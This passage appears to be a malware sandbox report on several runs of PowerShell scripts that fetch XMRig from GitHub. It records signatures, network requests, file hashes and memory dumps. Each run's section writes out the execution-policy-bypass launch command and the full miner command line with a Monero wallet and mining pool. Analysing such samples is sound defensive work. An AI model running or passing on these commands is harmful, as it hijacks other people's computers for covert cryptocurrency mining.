Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/4320-0-0x00007FFD06B13000-0x00007FFD06B15000-memory.dmp

memory/4320-10-0x000001EFD26A0000-0x000001EFD26C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kvx2v1wd.sdh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4320-11-0x00007FFD06B10000-0x00007FFD075D1000-memory.dmp

memory/4320-12-0x00007FFD06B10000-0x00007FFD075D1000-memory.dmp

memory/4320-14-0x00007FFD06B10000-0x00007FFD075D1000-memory.dmp

memory/4320-16-0x000001EFB9DF0000-0x000001EFB9DFA000-memory.dmp

memory/4320-15-0x000001EFD2670000-0x000001EFD2682000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4012-47-0x0000021C74270000-0x0000021C74290000-memory.dmp

memory/4012-48-0x0000021C742C0000-0x0000021C742E0000-memory.dmp

memory/4012-49-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-50-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4320-51-0x00007FFD06B13000-0x00007FFD06B15000-memory.dmp

memory/4320-52-0x00007FFD06B10000-0x00007FFD075D1000-memory.dmp

memory/4012-54-0x0000021D06EB0000-0x0000021D06ED0000-memory.dmp

memory/4012-53-0x0000021D06C80000-0x0000021D06CA0000-memory.dmp

memory/4012-55-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-56-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-58-0x0000021D06EB0000-0x0000021D06ED0000-memory.dmp

memory/4012-57-0x0000021D06C80000-0x0000021D06CA0000-memory.dmp

memory/4012-59-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-60-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-61-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-62-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-63-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-64-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-65-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-66-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

memory/4012-67-0x00007FF6A62C0000-0x00007FF6A6EF3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

153s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/1256-0-0x00007FFAA3CC3000-0x00007FFAA3CC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hfsd4be.fdx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1256-6-0x0000017A0F250000-0x0000017A0F272000-memory.dmp

memory/1256-11-0x00007FFAA3CC0000-0x00007FFAA4781000-memory.dmp

memory/1256-12-0x00007FFAA3CC0000-0x00007FFAA4781000-memory.dmp

memory/1256-14-0x00007FFAA3CC0000-0x00007FFAA4781000-memory.dmp

memory/1256-16-0x0000017A0F280000-0x0000017A0F28A000-memory.dmp

memory/1256-15-0x0000017A27740000-0x0000017A27752000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4644-47-0x0000027374280000-0x00000273742A0000-memory.dmp

memory/4644-48-0x00000273742C0000-0x00000273742E0000-memory.dmp

memory/4644-49-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/1256-50-0x00007FFAA3CC0000-0x00007FFAA4781000-memory.dmp

memory/1256-51-0x00007FFAA3CC3000-0x00007FFAA3CC5000-memory.dmp

memory/4644-54-0x0000027374300000-0x0000027374320000-memory.dmp

memory/4644-52-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-53-0x00000273742E0000-0x0000027374300000-memory.dmp

memory/4644-55-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/1256-56-0x00007FFAA3CC0000-0x00007FFAA4781000-memory.dmp

memory/4644-57-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-58-0x00000273742E0000-0x0000027374300000-memory.dmp

memory/4644-59-0x0000027374300000-0x0000027374320000-memory.dmp

memory/4644-60-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-61-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-62-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-63-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-64-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-65-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-66-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-67-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

memory/4644-68-0x00007FF67D900000-0x00007FF67E533000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

148s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/1012-4-0x00007FF8C4F00000-0x00007FF8C504A000-memory.dmp

memory/1012-5-0x00007FF8C4F00000-0x00007FF8C504A000-memory.dmp

memory/1012-6-0x000001C46E320000-0x000001C46E342000-memory.dmp

memory/1012-9-0x000001C46E9A0000-0x000001C46EA16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ff1sml5g.k3s.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1012-24-0x00007FF8C4F00000-0x00007FF8C504A000-memory.dmp

memory/1012-47-0x000001C46E3B0000-0x000001C46E3C2000-memory.dmp

memory/1012-60-0x000001C46E3A0000-0x000001C46E3AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3120-89-0x0000021A974C0000-0x0000021A974E0000-memory.dmp

memory/3120-90-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-91-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-92-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-93-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-94-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-95-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-96-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-97-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-98-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-99-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-100-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-101-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

memory/3120-102-0x00007FF7AE720000-0x00007FF7AF353000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

141s

Max time network

112s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp

Files

memory/2736-0-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

memory/2736-5-0x0000018B44A30000-0x0000018B44A52000-memory.dmp

memory/2736-8-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-10-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-9-0x0000018B44BE0000-0x0000018B44C56000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4duvkki1.awj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2736-25-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-48-0x0000018B44BC0000-0x0000018B44BD2000-memory.dmp

memory/2736-61-0x0000018B44BA0000-0x0000018B44BAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2580-90-0x000002DA10770000-0x000002DA10790000-memory.dmp

memory/2580-91-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2736-92-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

memory/2736-94-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2580-93-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2736-95-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2580-96-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-97-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-98-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-99-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-100-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-101-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-102-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-103-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-104-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-105-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

memory/2580-106-0x00007FF64A180000-0x00007FF64ADB3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240508-en

Max time kernel

149s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4308-0-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

memory/4308-9-0x000001E15EC90000-0x000001E15ECB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_docptmjp.uss.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4308-10-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4308-11-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4308-12-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4308-14-0x000001E15EE50000-0x000001E15EE62000-memory.dmp

memory/4308-15-0x000001E15ED30000-0x000001E15ED3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/776-46-0x000002E484180000-0x000002E4841A0000-memory.dmp

memory/776-47-0x000002E485990000-0x000002E4859B0000-memory.dmp

memory/776-48-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/4308-50-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4308-49-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

memory/776-51-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-54-0x000002E4859D0000-0x000002E4859F0000-memory.dmp

memory/776-53-0x000002E4859B0000-0x000002E4859D0000-memory.dmp

memory/4308-52-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/776-55-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-56-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-58-0x000002E4859D0000-0x000002E4859F0000-memory.dmp

memory/776-57-0x000002E4859B0000-0x000002E4859D0000-memory.dmp

memory/776-59-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-60-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-61-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-62-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-63-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-64-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-65-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-66-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-67-0x00007FF747510000-0x00007FF748143000-memory.dmp

memory/776-68-0x00007FF747510000-0x00007FF748143000-memory.dmp

Analysis: behavioral19

Detonation Overview

